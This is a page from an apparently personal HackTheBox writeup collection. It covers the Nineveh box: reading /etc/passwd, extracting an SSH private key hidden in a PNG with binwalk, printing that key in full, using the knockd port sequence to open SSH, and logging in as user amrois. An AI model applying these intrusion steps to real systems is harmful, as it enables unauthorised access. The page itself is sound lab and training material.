🔐
HackTheBox Writeups
  • kashz HTB Writeups
  • HTB BOXES
    • ACCESS
      • 5 admin
      • 4 user
      • 3 telnet
      • 2 http
      • 1 recon
    • ADMIRER
      • 5 root
      • 4 adminer-php
      • 3 ftp
      • 2 http
      • 1 recon
    • ARCHETYPE
      • 3 :1433 mssql
      • 2 :139 :445 smb
      • 1 recon
    • ARMAGEDDON
      • 8 privesc dirty_sockv2
      • 7 privesc
      • 6 box enum bruce
      • 5 :80 drupalgeddon2
      • 4 :80 droopescan
      • 3 :80
      • 2 :80 robots.txt
      • 1 recon
    • ATOM
      • 4 privesc
      • 3 box enum jason
      • 2 :139 :445 smb
      • 1 recon
    • BANK
      • 5 privesc
      • 4 box enum
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • BANKROBBER
      • 6 privesc brute force PIN > BOF
      • 5 privesc bankv2.exe
      • 4 box enum cortin
      • 3 admin backdoorchecker.php
      • 2 :80 :443 XSS > admin
      • 1 recon
    • BASHED
      • 2 :80
      • 1 recon
    • BASTARD
      • 6 privesc_2 ms10-059
      • 5 privesc_1 ms15-051
      • 4 box enum KE
      • 3 :80 drupalgeddon2
      • 2 :80 drupal7
      • 1 recon
    • BASTION
      • 3 box enum > privesc
      • 2 :139 :445 smb
      • 1 recon
    • BEEP
      • 7 :80 elastix 2.2.0 RCE + privesc
      • 6 :10000 webmin
      • 5 :25 smtp
      • 4 :80 vtigercrm
      • 3 :80 admin
      • 2 :80
      • 1 recon
    • BLOCKY
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • BLUE
      • 3 ms17-010
      • 2 :139 :445 smb
      • 1 recon
    • BLUNDER
      • 5 www-data > hugo > root
      • 4 box enum
      • 3 bludit 3.9.2 file_upload RCE
      • 2 :80
      • 1 recon
    • BOUNTY
      • 4 JuicyPotato
      • 3 privesc check
      • 2 :80
      • 1 recon
    • BOUNTYHUNTER
      • 4 privesc
      • 3 :22 ssh development
      • 2 :80 xxe
      • 1 recon
    • BRAINFUCK
      • 5 privesc
      • 5 :443 sup3rs3cr3t.brainfuck.htb
      • 4 :143 imap
      • 3 :443 wpscan
      • 2 :443
      • 1 recon
    • BRAINPAN1
      • 4 privesc
      • 3 BOF
      • 2 :10000
      • 1 recon
    • BUCKET
      • 6 privesc
      • 5 dynamodb roy
      • 4 box enum www-data
      • 3 :80 s3.bucket.htb
      • 2 :80 bucket.htb
      • 1 recon
    • BUFF
      • 4 privesc
      • 3 :80
      • 2 :8080
      • 1 recon
    • CAP
      • 4 privesc
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • CHATTERBOX
      • 5 privesc autologon creds
      • 4 privesc w/ grant perm
      • 3 box enum
      • 2 :9256 achat chat system
      • 1 recon
    • CONCEAL
      • 9 privesc
      • 8 :80
      • 7 :21 ftp
      • 6 post vpn recon
      • 5 ipsec conn config
      • 4 ipsec summary
      • 3 :500/udp ipsec
      • 2 :161/udp snmp
      • 1 recon
    • CRONOS
      • 6 post enum
      • 5 privesc cronjob
      • 4 box enum
      • 3 :53 dns
      • 2 :80
      • 1 recon
    • DELIVERY
      • 4 :3306 mysql > privesc
      • 3 :8065 mattermost
      • 2 :80
      • 1 recon
    • DEVEL
      • 4 privesc_2 ms11-046
      • 3 privesc_1 JuicyPotato
      • 2 :21 ftp
      • 1 recon
    • DOCTOR
      • 7 post enum
      • 6 :8089 privesc splunk > root
      • 5 web > shaun
      • 4 box enum web
      • 3 :80 SSTI
      • 2 :80 splunkd
      • 1 recon
    • DYNSTR
      • 6 privesc
      • 5 box enum > bindmgr
      • 4 nsupdate exploit
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • EXPLORE
      • 3 :2222 ssh kristi > root
      • 2 :59777 es file explorer
      • 1 recon
    • FRIENDZONE
      • 7 privesc
      • 6 administrator1.friendzone.red
      • 5 dns
      • 4 smb
      • 3 :443
      • 2 :80
      • 1 recon
    • FUSE
      • 7 privesc SeLoadDriverPrivilege
      • 6 rpc
      • 5 spray passwd
      • 4 :389 ldap
      • 3 :80 PaperCut Logger
      • 2 :139 :445 smb
      • 1 recon
    • GRANDPA
      • 4 privesc
      • 3 webdav exploit
      • 2 :80
      • 1 recon
    • GRANNY
      • 4 privesc
      • 3 :80 webdav exploit
      • 2 :80
      • 1 recon
    • HAIRCUT
      • 5 post enum
      • 4 privesc www-data > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • IRKED
      • 4 box enum
      • 3 :6697 irc
      • 2 :80
      • 1 recon
    • JARVIS
      • 9 post enum
      • 8 pepper > root
      • 7 www-data > pepper
      • 6 box enum www-data
      • 5 phpMyAdmin 4.8 LFI
      • 4 :80 sqli
      • 3 :64999
      • 2 :80
      • 1 recon
    • JEEVES
      • 2 :50000
      • 1 recon
    • JERRY
      • 4 manual
      • 3 tomcatWarDeployer
      • 2 :8080 tomcat
      • 1 recon
    • KNIFE
      • 3 privesc
      • 2 :80 php 8.1.0 dev
      • 1 recon
    • LABORATORY
      • 6 privesc
      • 5 gitlab admin dexter
      • 4 stable shell
      • 3 :443 gitlab shell
      • 2 :443 gitlab
      • 1 recon
    • LACASADEPAPEL
      • 4 box enum > privesc
      • 3 :80 > :443
      • 2 :21 ftp
      • 1 recon
    • LAME
      • 4 :139 :445 smb exploit
      • 3 :3632 distccd
      • 2 :139 :445 smb
      • 1 recon
    • LEGACY
      • 4 MS-17-010
      • 3 MS08-067
      • 2 :139 :445 smb
      • 1 recon
    • LOVE
      • 3 privesc
      • 2 :80
      • 1 recon
    • MAGIC
      • 5 post enum
      • 4 privesc theseus > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • MANGO
      • 6 post enum
      • 5 privesc admin > root
      • 4 mango > admin
      • 3 box enum mango
      • 2 :80 :443
      • 1 recon
    • MIRAI
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • MONITORS
      • 12 post enum
      • 11 docker breakout > root
      • 10 Apache Tomcat/9.0.31 deserialization RCE > docker root
      • 9 box enum marcus
      • 8 manual enum www-data
      • 7 :8443
      • 6 box enum www-data
      • 5 cacti-admin.monitors.htb
      • 4 wp with spritz exploit
      • 3 :80 wpscan
      • 2 :80
      • 1 recon
    • NETWORKED
      • 7 post enum
      • 6 box enum guly > privesc > root
      • 5 check_attack.php
      • 4 box enum
      • 3 :80 upload.php & lib.php
      • 2 :80
      • 1 recon
    • NIBBLES
      • 4 privesc
      • 3 fileUpload exploit
      • 2 :80
      • 1 recon
    • NINEVEH
      • 6 post enum
      • 5 privesc amrois > root
      • 4 box enum www-data > amrois
      • 3 :443
      • 2 :80
      • 1 recon
    • NODE
      • 7 post enum
      • 6 privesc tom > root
      • 5 mark > tom
      • 4 box enum mark
      • 3 :3000 login
      • 2 :3000
      • 1 recon
    • OMNI
      • 5 cracking user.txt | root.txt
      • 4 dump SAM SYSTEM
      • 3 box enum ?
      • 2 :8080
      • 1 recon
    • OOPSIE
      • 4 post enum
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • OPENADMIN
      • 6 joanna > root
      • 5 jimmy > joanna
      • 4 manual enum > jimmy
      • 3 openNetAdmin 18.1.1
      • 2 :80
      • 1 recon
    • OPHIUCHI
      • 4 privesc
      • 3 yaml deserialization exploit
      • 2 :8080
      • 1 recon
    • OPTIMUM
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • PASSAGE
      • 7 post enum
      • 6 privesc dbus com.ubuntu.USBCreator.conf
      • 5 box enum nadav
      • 4 box enum paul
      • 3 box enum www-data
      • 2 :80 cutenews
      • 1 recon
    • POISON
      • 6 foothold_3 log poisoning
      • 5 foothold_2 phpinfo.php + LFI
      • 4 privesc vncviewer > root
      • 3 box enum charix
      • 2 :80
      • 1 recon
    • POPCORN
      • 7 post enum
      • 6 privesc_2 rds
      • 5 privesc_1 full-nelson
      • 4 manual privesc > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • POSTMAN
      • 6 webmin (matt > root)
      • 5 Matt > root
      • 4 redis > Matt
      • 3 :6379 redis
      • 2 :80
      • 1 recon
    • QUERIER
      • 6 privesc GPP CachedPassword
      • 5 privesc
      • 4 mssql using msf
      • 3 mssql
      • 2 smb
      • 1 recon
    • READY
      • 4 PEAS > docker > escape > root
      • 3 :5080 gitlab
      • 2 :5080 robots.txt
      • 1 recon
    • REMOTE
      • 8 privesc teamviewer
      • 7 privesc UsoSvc
      • 6 privesc
      • 5 RCE
      • 4 :111 rpc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • SCRIPTKIDDIE
      • 2 :5000
      • 1 recon
    • SECNOTES
      • 9 privesc_3 bash.exe
      • 8 privesc_2 UsoSvc
      • 7 privesc_1 PrintSpoofer
      • 6 box enum iis apppool
      • 5 :445 smb
      • 4 :80 CSRF
      • 3 :8808 IIS
      • 2 :80 IIS
      • 1 recon
    • SENSE
      • 2 :80 pfsense
      • 1 recon
    • SERVMON
      • 5 privesc
      • 4 box enum nadine
      • 3 :80 NVMS
      • 2 :21 ftp
      • 1 recon
    • SHIELD
      • 3 privesc
      • 2 :80
      • 1 recon
    • SHOCKER
      • 2 :80 shellshock
      • 1 recon
    • SILO
      • 6 odat shell
      • 5 sqlplus
      • 4 :1521 orcale tns listener
      • 3 :8080 XDB
      • 2 :80
      • 1 recon
    • SNEAKYMAILER
      • 11 post enum
      • 10 privesc low > root
      • 9 localhost:5000 > low
      • 8 box enum developer
      • 7 box enum www-data
      • 6 :21 ftp
      • 5 :143 imap
      • 4 :25 smtp
      • 3 :8080
      • 2 :80
      • 1 recon
    • SNIPER
      • 8 box enum chris + privesc
      • 7 iusr > chris
      • 6 privesc_1 PrintSpoofer
      • 5 box enum nt authority\iusr
      • 4 :80 /blog > LFI > smbRFI
      • 3 :80 /user
      • 2 :80
      • 1 recon
    • SOLIDSTATE
      • 7 privesc
      • 6 :22 ssh mindy
      • 5 :110 pop3
      • 4 apache james 2.3.2 RCE
      • 3 :4555 JAMES RAT 2.3.2
      • 2 :80
      • 1 recon
    • SPECTRA
      • 4 nginx shell > katie
      • 3 wordpress
      • 2 :80
      • 1 recon
    • SPIDER
      • 8 post enum
      • 7 localhost:8080 XXE
      • 6 box enum chiv manual
      • 5 box enum chiv
      • 4 :80 chiv login + SSTI
      • 3 :80 sqlmap via flask cookie
      • 2 :80 SSTI via /register to /user
      • 1 recon
    • SWAGSHOP
      • 3 privesc
      • 2 :80
      • 1 recon
    • TABBY
      • 5 tomcat > ash > root
      • 4 box enum
      • 3 :8080 tomcat9
      • 2 :80
      • 1 recon
    • TARTARSAUCE
      • 10 post enum
      • 9 privesc omuna > root
      • 8 box enum onuma
      • 7 www-data > onuma
      • 6 box enum www-data
      • 5 :80 monstra
      • 4 :80 wpscan
      • 3 :80 monstra
      • 2 :80
      • 1 recon
    • TENET
      • 4 privesc
      • 3 php file injection (deserialization exploit)
      • 2 :80 wordpress
      • 1 recon
    • THENOTEBOOK
      • 5 privesc docker runC exploit
      • 4 shell
      • 3 :80 JWT exploitation
      • 2 :80
      • 1 recon
    • TRAVEREXEC
      • 5 david > root
      • 4 www-data > david
      • 3 box enum
      • 2 :80 nostromo 1.9.6
      • 1 recon
    • VACCINE
      • 4 privesc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • VALENTINE
      • 6 privesc dirtyc0w
      • 5 privesc tmux
      • 4 box enum
      • 3 heartbleed
      • 2 :80
      • 1 recon
    • WORKER
      • 11 evil-winrim robisl :5985
      • 10 box manual enum
      • 9 box enum iis apppool\defaultapppool
      • 8 privesc PrintSoofer FAIL
      • 7 :80 spectral.worker.htb shell
      • 6 :80 devops.worker.htb
      • 5 explore domains
      • 4 :80 dimension.worker.htb
      • 3 :3690 subversion
      • 2 :80 IIS 10.0
      • 1 recon
Powered by GitBook
On this page
  1. HTB BOXES
  2. NINEVEH

4 box enum www-data > amrois

www-data@nineveh:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash

www-data@nineveh:/var/www/ssl/secure_notes$ ls -la
total 2840
drwxr-xr-x 2 root root    4096 Jul  2  2017 .
drwxr-xr-x 4 root root    4096 Jul  2  2017 ..
-rw-r--r-- 1 root root      71 Jul  2  2017 index.html
-rw-r--r-- 1 root root 2891984 Jul  2  2017 nineveh.png

# definitely a big
# even -rw-r--r-- 1 root root 560852 Jul  2  2017 ninevehForAll.png

# analyzing both have zlib compressed data in them but only one was extracted correctly

$ file nineveh.png
nineveh.png: PNG image data, 1497 x 746, 8-bit/color RGB, non-interlaced
$ binwalk nineveh.png
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)
	
$ binwalk -Me nineveh.png

Scan Time:     2021-09-29 17:24:56
Target File:   /home/kashz/Desktop/HTB/nineveh/nineveh.png
MD5 Checksum:  353b8f5a4578e4472c686b6e1f15c808
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)

Scan Time:     2021-09-29 17:24:56
Target File:   /home/kashz/Desktop/HTB/nineveh/_nineveh.png.extracted/54
MD5 Checksum:  d41d8cd98f00b204e9800998ecf8427e
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------

Scan Time:     2021-09-29 17:24:56
Target File:   /home/kashz/Desktop/HTB/nineveh/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum:  f426d661f94b16292efc810ebb7ea305
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PEM RSA private key

Scan Time:     2021-09-29 17:24:56
Target File:   /home/kashz/Desktop/HTB/nineveh/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum:  6b60618d207ad97e76664174e805cfda
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             OpenSSH RSA public key

$ tree .
├── nineveh.png
└── _nineveh.png.extracted
    ├── 2BF8D0.tar
    ├── 54
    ├── 54.zlib
    └── secret
        ├── nineveh.priv
        └── nineveh.pub

2 directories, 6 files

# nineveh.priv
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----

# nineveh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

# seems like amrois ssh keys
# but ssh is not open

# port knocking??
# looking at open processes; found 
root      1306  1.1  0.2   8756  2224 ?        Ss   16:55   1:44 /usr/sbin/knockd -d -i ens160

Searching for this file found 
| https://www.techrepublic.com/article/how-to-obscure-open-ports-with-knockd/

# config file /etc/knockd.conf
www-data@nineveh:/var/www/html$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
 
# to open SSH port, need to send SYN packet to 571, 290, 911
# using knock 

$ knock nineveh.htb 571 290 911
[OR]
$ for i in 571 290 911; do
for> nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null
for> done; ssh -i _nineveh.png.extracted/secret/nineveh.priv amrois@10.10.10.43

$ nmap -F nineveh.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 17:32 PDT
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (0.093s latency).
Not shown: 97 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

amrois@nineveh:~$ whoami;id
amrois
uid=1000(amrois) gid=1000(amrois) groups=1000(amrois)
Previous5 privesc amrois > rootNext3 :443

Last updated 3 years ago